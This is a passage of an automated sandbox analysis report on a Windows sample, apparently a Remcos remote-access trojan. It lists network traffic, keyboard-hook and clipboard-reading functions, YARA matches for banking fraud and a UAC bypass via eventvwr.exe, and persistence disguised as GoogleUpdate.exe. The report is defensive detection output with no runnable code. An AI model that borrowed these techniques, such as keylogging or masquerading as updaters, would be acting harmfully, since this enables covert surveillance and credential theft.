                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59613 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57493 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63388 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51125
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63108
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63107
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51133
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51135
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56647 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63119
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64244 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51141
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63113
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61531 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54491 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63340 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58361 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57527 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58373 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57515 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64185 -> 443

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00409340 SetWindowsHookExA 0000000D,0040932C,000000000_2_00409340
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeWindows user hook set: 0 keyboard low level C:\ProgramData\GoogleDat\GoogleUpdate.exeJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040A65A
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_00414EC1
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_00414EC1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D64EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_02D64EC1
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_00414EC1
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,18_2_00414EC1
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040A65A
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,0_2_00409468

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: DB5rQYsfd6.exe, type: SAMPLE
                  Source: Yara matchFile source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041A76C SystemParametersInfoW,0_2_0041A76C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0041A76C SystemParametersInfoW,10_2_0041A76C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D6A76C SystemParametersInfoW,13_2_02D6A76C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0041A76C SystemParametersInfoW,15_2_0041A76C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0041A76C SystemParametersInfoW,18_2_0041A76C

                  System Summary

                  barindex
                  Source: DB5rQYsfd6.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: DB5rQYsfd6.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: DB5rQYsfd6.exe, type: SAMPLEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000003.1665273424.000000000054C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
